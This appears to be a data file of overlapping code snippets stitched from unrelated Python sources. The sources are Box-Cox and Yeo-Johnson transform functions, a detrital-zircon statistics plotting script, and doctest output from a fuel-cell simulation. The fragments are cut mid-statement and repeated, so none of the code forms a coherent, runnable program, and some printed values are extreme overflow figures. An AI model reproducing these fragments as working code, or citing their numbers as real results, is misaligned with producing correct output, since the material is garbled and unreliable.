ret @sync_numerical_libs def", "two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam,", "for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:,", "just minimizes the KS-stat, # would might better to used shapiro-wilk or 'normaltest'", "lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] +", "batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask =", "pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask", "1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask]", "@sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" #", "lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0", "xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf", "xp.ravel(a) # axis = 0 axis = y.ndim - 1 y_in = y.astype(xp.float64)", "/ xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))),", "pylint: disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False,", "transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 =", "axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp,", "CDF, batched.\"\"\" t = x - mu[:, None] y = 0.5 * xp.special.erfc(-t", "self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using", "lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform,", "None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse 
Yeo-Johnson tranform, batched in the first dimension.\"\"\"" ]
[ "1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1:", "define lower limit for probability density plots (PDPs) and kernel density estimates (KDEs)", "intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs", "sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax,", "xmin = 1 # define lower limit for probability density plots (PDPs) and", "1 # discretization interval for PDPs and KDEs only #DZtools options DZstats =", "= 1 # discretization interval for PDPs and KDEs only #DZtools options DZstats", "xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint)", "#upper limit for PDPs and KDEs and all plots xint = 1 #", "filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df,", "pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if", "= 1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1]", "sys #import argparse import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample", "(PDPs) and kernel density estimates (KDEs) and all plots xmax = 4000 #upper", "(KDEs) and all plots xmax = 4000 #upper limit for PDPs and KDEs", "# define lower limit for probability density plots (PDPs) and kernel density estimates", "matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin =", "DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions ==", "density estimates (KDEs) and all plots xmax = 4000 #upper limit for PDPs", "dztools.utils.makeplots import makeplots xmin = 1 # define lower limit for probability density", "from dztools.utils.makeplots import makeplots xmin = 1 # define lower limit for probability", "as 
pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import", "and all plots xmax = 4000 #upper limit for PDPs and KDEs and", "PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__", "lower limit for probability density plots (PDPs) and kernel density estimates (KDEs) and", "== 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__ ==", "PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats", "density plots (PDPs) and kernel density estimates (KDEs) and all plots xmax =", "= 4000 #upper limit for PDPs and KDEs and all plots xint =", "import makeplots xmin = 1 # define lower limit for probability density plots", "if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if", "print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show()", "DZstats = 1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename =", "dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1 # define lower", "= pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results)", "options DZstats = 1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename", "= 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename)", "and KDEs only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions =", "xmax = 4000 #upper limit for PDPs and KDEs and all plots xint", "limit for PDPs and KDEs and all plots xint = 1 # discretization", "argparse import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample", "== 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1:", "only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions = 1 def", "and all plots xint = 
1 # discretization interval for PDPs and KDEs", "limit for probability density plots (PDPs) and kernel density estimates (KDEs) and all", "for PDPs and KDEs only #DZtools options DZstats = 1 DZmds = 0", "intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df,", "= sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin,", "df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint)", "import sys #import argparse import pandas as pd import matplotlib.pyplot as plt from", "pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots", "probability density plots (PDPs) and kernel density estimates (KDEs) and all plots xmax", "DZmds = 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df =", "xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax,", "1 # define lower limit for probability density plots (PDPs) and kernel density", "1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df", "plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1 #", "plots xint = 1 # discretization interval for PDPs and KDEs only #DZtools", "xint = 1 # discretization interval for PDPs and KDEs only #DZtools options", "KDEs and all plots xint = 1 # discretization interval for PDPs and", "def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results", "intersample from dztools.utils.makeplots import makeplots xmin = 1 # define lower limit for", "makeplots xmin = 1 # define lower limit for probability density plots (PDPs)", "0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if", "estimates (KDEs) and all plots xmax = 4000 #upper limit for PDPs and", "1: fig, axs = makeplots(df, xmin, 
xmax, xint) plt.show() if __name__ == '__main__':", "DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results =", "plots (PDPs) and kernel density estimates (KDEs) and all plots xmax = 4000", "KDEs only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions = 1", "plots xmax = 4000 #upper limit for PDPs and KDEs and all plots", "= 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats ==", "discretization interval for PDPs and KDEs only #DZtools options DZstats = 1 DZmds", "all plots xmax = 4000 #upper limit for PDPs and KDEs and all", "pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots", "= 1 # define lower limit for probability density plots (PDPs) and kernel", "all plots xint = 1 # discretization interval for PDPs and KDEs only", "import intersample from dztools.utils.makeplots import makeplots xmin = 1 # define lower limit", "= intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs =", "from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1 # define", "kernel density estimates (KDEs) and all plots xmax = 4000 #upper limit for", "1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig,", "xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin,", "fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__ == '__main__': DZ_main()", "4000 #upper limit for PDPs and KDEs and all plots xint = 1", "PDPs and KDEs only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions", "and KDEs and all plots xint = 1 # discretization interval for PDPs", "PDPs and KDEs and all plots xint = 1 # discretization interval for", "for PDPs and KDEs and all plots xint = 1 # discretization interval", "import matplotlib.pyplot as plt from 
dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin", "import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from", "and kernel density estimates (KDEs) and all plots xmax = 4000 #upper limit", "as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1", "#DZtools options DZstats = 1 DZmds = 0 PlotDistributions = 1 def DZ_main():", "# discretization interval for PDPs and KDEs only #DZtools options DZstats = 1", "#import argparse import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import", "interval for PDPs and KDEs only #DZtools options DZstats = 1 DZmds =", "if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions", "for probability density plots (PDPs) and kernel density estimates (KDEs) and all plots" ]
[ "Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363", "0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration :", ": 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta Activation", "4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration :", ": 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2", ": 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 :", "Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V", "PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ###########", ": 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V", "PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal", ": 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2", "Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272", "Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta", "V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm", ": -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss", "atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7", "Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083", "0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391", "FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm", "Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC 
Power : 5.1674201677537885", "atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2", "PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ###########", "0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage", ": 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I", "Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W", ": 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2", "I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta", "Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W", "FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm", ": 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O :", "########### I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V", ": 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O :", "FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266", ": 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC", "0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973", ": 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V", "Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W", ": 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal :", "atm PH2O : 0.24206059193086493 atm PO2 : 
0.19034078646315894 atm Power-Thermal : 8.29401625290499 W", "atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5", "PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E", "Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518", ">>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . .", "0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC", ": 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta Activation", "PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E", "V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm", ": 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O :", "atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5", ": 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2", ": 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta Activation", "0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss :", "0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss :", "0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I :", "V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm", "Simulation ########### Analyzing . . . 
I : 0.1 E : 6.14455344314445 V", "Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5]", "0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning :", "Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O", "0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998", ": 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal :", "V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency", "3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration :", "Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5]", "PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal", "atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V", ": 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report", "V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency", "V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency", "Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta", "0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038", "atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7", "PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal", "atm PO2 : 
0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8", "atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W", ": 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 :", "5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 :", "0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage", "Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic :", "Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O", "0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC", ": 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V", "########### I : 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V", "FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337", "Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2", "10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 :", ": 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 :", "Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V", "6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta", "Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency :", "V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic", "V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency", "N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> 
Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)", ": 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta Activation", ": 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal :", "PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ###########", "W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024", "PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E", "W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599", "W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188", "FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335", "5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta Activation :", "Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W", "Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W", "V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency", "Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2", ": 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O :", ": 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V", "0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage", "V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 
0.5271753860695316 FC Power :", ": 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal :", "FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867", "W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353", "V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage :", "TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E", "PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E", "6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta", ": 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC", "... Warning : The value of I(>0.1) leads to minus amount of V,", "atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W", "atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9", "6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta", "6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta", ": 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I", "Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316", "FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575", "0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power", "0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage", "Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287", "0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC 
Efficiency : 0.5023661507925354 FC Power", "4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498", "0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC", ": 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V", "Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2", "Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V", ": 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss", "atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W", "is generating ... Warning : The value of I(>0.1) leads to minus amount", "FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316", "Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency :", "Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2", "W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134", ": 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC", "V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm", "Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta", "0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012", "Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271", ": 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V", ": 
0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V", "-0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9", ": 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta Activation", "5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta Activation :", "V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm", "0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841", "0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power", ": 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC", "W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484", "########### I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V", "V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power :", ": 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2", ": 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss", "V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic", "0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is", "Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta", "0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage", "W ########### I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425", "-2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss :", "PH2 : 0.19681948279244216 atm PH2O : 
